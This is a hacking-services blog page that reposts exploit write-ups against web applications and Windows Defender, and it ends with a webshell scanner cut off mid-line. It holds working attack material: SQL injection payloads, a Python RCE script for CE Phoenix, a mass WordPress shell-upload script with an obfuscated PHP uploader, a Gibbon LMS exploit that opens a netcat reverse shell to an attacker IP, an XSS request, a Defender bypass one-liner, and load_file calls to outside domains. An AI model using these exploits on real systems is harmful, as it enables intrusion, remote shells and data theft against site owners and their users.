Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863108959

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Smart School 6.4.1 - SQL Injection
# Exploit Author: CraCkEr
# Date: 28/09/2023
# Vendor: QDocs - qdocs.net
# Vendor Homepage: https://smart-school.in/
# Software Link: https://demo.smart-school.in/
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-5495
# CWE: CWE-89 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /course/filterRecords/

POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]

-------------------------------------------
POST /course/filterRecords/ HTTP/1.1


searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3

-------------------------------------------

searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]


Path: /course/filterRecords/


POST Parameter 'searchdata[0][title]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi
POST Parameter 'searchdata[1][title]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi
POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi

---
Parameter: searchdata[0][title] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchfield] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[0][searchvalue] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][title] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low

Parameter: searchdata[1][searchvalue] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z
---


-------------------------------------------
POST /course/filterRecords/ HTTP/1.1


searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]
-------------------------------------------



Path: /online_admission

---
Parameter: MULTIPART email ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--
---

POST Parameter 'email' is vulnerable to SQLi

POST /online_admission HTTP/1.1

-----------------------------320375734131102816923531485385
Content-Disposition: form-data; name="email"

*[SQLi]
-----------------------------320375734131102816923531485385


[-] Done
HireHackking 
## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)
#### Date: 2023-11-25
#### Exploit Author: tmrswrr
#### Category: Webapps
#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)
#### Version: v1.0.8.20
#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)

## EXPLOIT :

import requests
from bs4 import BeautifulSoup
import sys
import urllib.parse
import random
from time import sleep

class colors:
    OKBLUE = '\033[94m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    CBLACK = '\33[30m'
    CRED = '\33[31m'
    CGREEN = '\33[32m'
    CYELLOW = '\33[33m'
    CBLUE = '\33[34m'
    CVIOLET = '\33[35m'
    CBEIGE = '\33[36m'
    CWHITE = '\33[37m'

 
def entry_banner():
    color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
                    colors.CRED, colors.CBEIGE]
    random.shuffle(color_random)

    banner = color_random[0] + """
     CE Phoenix v1.0.8.20 - Remote Code Execution \n
     Author: tmrswrr
    """
    for char in banner:
        print(char, end='')
        sys.stdout.flush()
        sleep(0.0045)

def get_formid_and_cookies(session, url):
    response = session.get(url, allow_redirects=True)
    if response.ok:
        soup = BeautifulSoup(response.text, 'html.parser')
        formid_input = soup.find('input', {'name': 'formid'})
        if formid_input:
            return formid_input['value'], session.cookies
    return None, None

def perform_exploit(session, url, username, password, command):
    print("\n[+] Attempting to exploit the target...")

   
    initial_url = url + "/admin/define_language.php?lngdir=english&filename=english.php"
    formid, cookies = get_formid_and_cookies(session, initial_url)
    if not formid:
        print("[-] Failed to retrieve initial formid.")
        return

    # Login
    print("[+] Performing login...")
    login_payload = {
        'formid': formid,
        'username': username,
        'password': password
    }
    login_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': initial_url
    }
    login_url = url + "/admin/login.php?action=process"
    login_response = session.post(login_url, data=login_payload, headers=login_headers, allow_redirects=True)

    if not login_response.ok:
        print("[-] Login failed.")
        print(login_response.text)
        return

    print("[+] Login successful.")


    new_formid, _ = get_formid_and_cookies(session, login_response.url)
    if not new_formid:
        print("[-] Failed to retrieve new formid after login.")
        return

    # Exploit
    print("[+] Executing the exploit...")
    encoded_command = urllib.parse.quote_plus(command)
    exploit_payload = f"formid={new_formid}&file_contents=%3C%3Fphp+echo+system%28%27{encoded_command}%27%29%3B"
    exploit_headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'cepcAdminID={cookies["cepcAdminID"]}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36',
        'Referer': login_response.url
    }
    exploit_url = url + "/admin/define_language.php?lngdir=english&filename=english.php&action=save"
    exploit_response = session.post(exploit_url, data=exploit_payload, headers=exploit_headers, allow_redirects=True)

    if exploit_response.ok:
        print("[+] Exploit executed successfully.")
    else:
        print("[-] Exploit failed.")
        print(exploit_response.text)

    
    final_response = session.get(url)
    print("\n[+] Executed Command Output:\n")
    print(final_response.text)  

def main(base_url, username, password, command):
    print("\n[+] Starting the exploitation process...")
    session = requests.Session()
    perform_exploit(session, base_url, username, password, command)

if __name__ == "__main__":
    entry_banner()

    if len(sys.argv) < 5:
        print("Usage: python script.py [URL] [username] [password] [command]")
        sys.exit(1)

    base_url = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    command = sys.argv[4]

    main(base_url, username, password, command)
HireHackking 
[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec     
 

[Vendor]
www.microsoft.com


[Product]
Windows Defender


[Vulnerability Type]
Windows Defender Detection Mitigation Bypass
TrojanWin32Powessere.G


[CVE Reference]
N/A


[Security Issue]
Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail
and attackers will typically get an "Access is denied" error message.

Back in 2022, I first disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated.
Recently Feb 7, 2024, I disclosed using multi-commas "," will bypass that mitigation but has since been fixed again.
The fix was short lived as I find yet another third trivial bypass soon after.


[Exploit/POC]
Open command prompt as Administrator.

C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(13)
Access is denied.

C:\sec>rundll32.exe javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ";alert('HYP3RLINX')


[Video PoC URL]
https://www.youtube.com/watch?v=yn9gdJ7c7Kg


[Network Access]
Local


[Severity]
High


[References]
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
https://twitter.com/hyp3rlinx/status/1755417914599956833
https://twitter.com/hyp3rlinx/status/1758624140213264601


[Disclosure Timeline]
Vendor Notification:  
February 16, 2024 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
HireHackking 
# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
# Date: 2024-02-25
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys , requests, re , json
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)

headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}

uploader = """
GIF89a
<?php ?>
<!DOCTYPE html>
<html>
<head>
  <title>Resultz</title>
</head>
<body><h1>Uploader</h1>
  <form enctype='multipart/form-data' action='' method='POST'>
    <p>Uploaded</p>
    <input type='file' name='uploaded_file'></input><br />
    <input type='submit' value='Upload'></input>
  </form>
</body>
</html>
<?PHP
if(!empty($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')])){$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=base64_decode('Li8=');$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485=$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485.basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]);if(move_uploaded_file($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$fdudxfib_d6fe1d0be6347b8ef2427fa629c04485)){echo
base64_decode('VGhlIGZpbGUg').basename($_FILES[base64_decode('dXBsb2FkZWRfZmlsZQ==')][base64_decode('bmFtZQ==')]).base64_decode('IGhhcyBiZWVuIHVwbG9hZGVk');}else{echo
base64_decode('VGhlcmUgd2FzIGFuIGVycm9yIHVwbG9hZGluZyB0aGUgZmlsZSwgcGxlYXNlIHRyeSBhZ2FpbiE=');}}?>
"""
requests.urllib3.disable_warnings()

def Exploit(Domain):
    try:
        if 'http' in Domain:
          Domain = Domain
        else:
          Domain = 'http://'+Domain
        myup = {'': ('db.php', uploader)}
        req = requests.post(Domain +
'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
files=myup, headers=headers,verify=False, timeout=10).text
        req1 = requests.get(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
        if 'Ex3ptionaL' in req1:
          print (fg+'[+] '+ Domain + ' --> Shell Uploaded')
          open('Shellz.txt', 'a').write(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')
        else:
          print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')
    except:
        print(fr+' -| ' + Domain + ' --> {} [Failed]')

target = open(input(fm+"Site List: "), "r").read().splitlines()
mp = Pool(int(input(fm+"Threads: ")))
mp.map(Exploit, target)
mp.close()
mp.join()
HireHackking

Gibbon LMS v26.0.00 - SSTI vulnerability

HACKER · %s · %s

# Exploit Title: Gibbon LMS v26.0.00 - SSTI vulnerability # Date: 21.01.2024 # Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24724 import requests import re import sys def login(target_host, target_port,email,password): url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} data = f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: form-data; name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n" r = requests.post(url, headers=headers, data=data, allow_redirects=False) Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie']) if Session_Cookie[4] is not None and '/index.php' in str(r.headers['Location']): print("login successful!") return Session_Cookie[4] def rce(cookie, target_host, target_port, attacker_ip, attacker_port): url = f'http://{target_host}:{target_port}/modules/School%20Admin/messengerSettingsProcess.php' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------67142646631840027692410521651", "Cookie": cookie} data = f"-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"address\"\r\n\r\n/modules/School Admin/messengerSettings.php\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"enableHomeScreenWidget\"\r\n\r\nY\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"signatureTemplate\"\r\n\r\n{{{{[\'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >/tmp/f']|filter('system')}}}}\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"messageBcc\"\r\n\r\n\r\n-----------------------------67142646631840027692410521651\r\nContent-Disposition: form-data; name=\"pinnedMessagesOnHome\"\r\n\r\nN\r\n-----------------------------67142646631840027692410521651--\r\n" r = requests.post(url, headers=headers, data=data, allow_redirects=False) if 'success0' in str(r.headers['Location']): print("Payload uploaded successfully!") def trigger(cookie, target_host, target_port): url = f'http://{target_host}:{target_port}/index.php?q=/modules/School%20Admin/messengerSettings.php&return=success0' headers = {"Cookie": cookie} print("RCE successful!") r = requests.get(url, headers=headers, allow_redirects=False) if __name__ == '__main__': if len(sys.argv) != 7: print("Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>") sys.exit(1) cookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6]) rce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4]) trigger(cookie, sys.argv[1], sys.argv[2])
HireHackking

Axigen < 10.5.7 - Persistent Cross-Site Scripting

HACKER · %s · %s

# Exploit Title: Axigen < 10.5.7 - Persistent Cross-Site Scripting # Date: 2023-09-25 # Exploit Author: Vinnie McRae - RedTeamer IT Security # Vendor Homepage: https://www.axigen.com/ # Software Link: https://www.axigen.com/mail-server/download/ # Version: (10.5.7) and older version of Axigen WebMail # Tested on: firefox, chrome # CVE: CVE-2023-48974 Description The `serverName_input` parameter is vulnerable to stored cross-site scripting (XSS) due to unsanitized or unfiltered processing. This means that an attacker can inject malicious code into this parameter, which will then be executed by other users when they view the page where the parameter is used. This is affecting authenticated administrators, and the attack can be used to attack other administrators with more permissions. Exploitation 1. Login as administrator 2. Navigate to "global settings" 3. Change server name to <script>alert(1)</script> PoC of the POST request: ``` POST /?_h=1bb40e85937506a7186a125bd8c5d7ef&page=gl_set HTTP/1.1 Host: localhost:9443 Cookie: eula=true; WMSessionObject=%7B%22accountFilter%22%3A%22%22%2C%22currentDomainName%22%3A%22axigen%22%2C%22currentPrincipal%22%3A%22nada%22%2C%22domainFilter%22%3A%22%22%2C%22folderRecipientFilter%22%3A%22%22%2C%22groupFilter%22%3A%22%22%2C%22helpContainer%22%3A%22opened%22%2C%22leftMenu%22%3A%5B%22rights%22%2C%22services%22%2C%22clustering%22%2C%22domains%22%2C%22logging%22%2C%22backup%22%2C%22security%22%5D%2C%22mlistFilter%22%3A%22%22%2C%22premiumFilter%22%3A%22%22%2C%22sslCertificateFilter%22%3A%22%22%7D; webadminIsModified=false; webadminIsUpdated=true; webadminIsSaved=true; public_language=en; _hadmin=6a8ed241fe53d1b28f090146e4c65f52; menuLeftTopPosition=-754 Content-Type: multipart/form-data; boundary=---------------------------41639384187581032291088896642 Content-Length: 12401 Connection: close -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="serverName_input" <script>alert(1)</script> -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="primary_domain_input" axigen -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="ssl_random_file_input" --SNIP-- -----------------------------41639384187581032291088896642 Content-Disposition: form-data; name="update" Save Configuration -----------------------------41639384187581032291088896642-- ``` #______________________________ #Vinnie McRae #RedTeamer IT Security #Blog: redteamer.de/blog-beitrag/
HireHackking

Computer Laboratory Management System v1.0 - Multiple-SQLi

HACKER · %s · %s

# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi # Author: nu11secur1ty # Date: 03/28/2024 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 # Reference: https://portswigger.net/web-security/sql-injection # Description: The id parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+' was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN (2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=user/manage_user&id=7''' AND (SELECT 1734 FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT (ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM (SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU Type: UNION query Title: MySQL UNION query (NULL) - 11 columns Payload: page=user/manage_user&id=-2854' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL# ---
HireHackking

Human Resource Management System v1.0 - Multiple SQLi

HACKER · %s · %s

## Title: Human Resource Management System v1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 04/02/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The cityedit parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+' was submitted in the cityedit parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: cityedit (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' RLIKE (SELECT (CASE WHEN (1759=1759) THEN 0x3232+(select load_file(0x5c5c5c5c726a6564686468666a3662336a3175736a30656f696978343376396f786b6c626f7a666d3561752e6f6173746966792e636f6d5c5c656969))+'' ELSE 0x28 END)) AND 'GMzs'='GMzs Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' OR (SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x716b787671,(SELECT (ELT(8880=8880,1))),0x7178626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'qJHK'='qJHK Type: time-based blind Title: MySQL > 5.0.12 AND time-based blind (heavy query) Payload: cityedit=22'+(select load_file('\\\\rjedhdhfj6b3j1usj0eoiix43v9oxklbozfm5au.oastify.com\\eii'))+'' AND 2124=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) AND 'Jtnd'='Jtnd --- ```
HireHackking

Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload # Date: 2024-04-01 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys import os.path import requests import re import urllib3 from requests.exceptions import SSLError from multiprocessing.dummy import Pool as ThreadPool from colorama import Fore, init init(autoreset=True) error_color = Fore.RED info_color = Fore.CYAN success_color = Fore.GREEN highlight_color = Fore.MAGENTA requests.urllib3.disable_warnings() headers = { 'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'Referer': 'www.google.com' } def URLdomain(url): if url.startswith("http://"): url = url.replace("http://", "") elif url.startswith("https://"): url = url.replace("https://", "") if '/' in url: url = url.split('/')[0] return url def check_security(url): fg = success_color fr = error_color try: url = 'http://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/travelscape/json.php', headers=headers, allow_redirects=True, timeout=15) if 'MSQ_403' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/travelscape/json.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/aahana/json.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'MSQ_403' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('MSQ_403.txt', 'a').write(url + '/wp-content/themes/aahana/json.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) check = requests.get(url + '/wp-content/themes/travel/issue.php', headers=headers, allow_redirects=True, timeout=15) if 'Yanz Webshell!' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/wp-content/themes/travel/issue.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/about.php', headers=headers, allow_redirects=True, timeout=15) if 'Yanz Webshell!' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/about.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/themes/digital-download/new.php', headers=headers, allow_redirects=True, timeout=15) if '#0x2525' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('digital-download.txt', 'a').write(url + '/wp-content/themes/digital-download/new.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) url = 'http://' + URLdomain(url) check = requests.get(url + '/epinyins.php', headers=headers, allow_redirects=True, timeout=15) if 'Uname:' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/epinyins.php\n') else: print(' -| ' + url + ' --> {}[Failed]'.format(fr)) url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-admin/dropdown.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'Uname:' in check.text: print(' -| ' + url + ' --> {}[Successfully]'.format(fg)) open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url + '/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers, allow_redirects=True, verify=False, timeout=15) if 'Simple Shell' in check.text: print(' -| ' + url 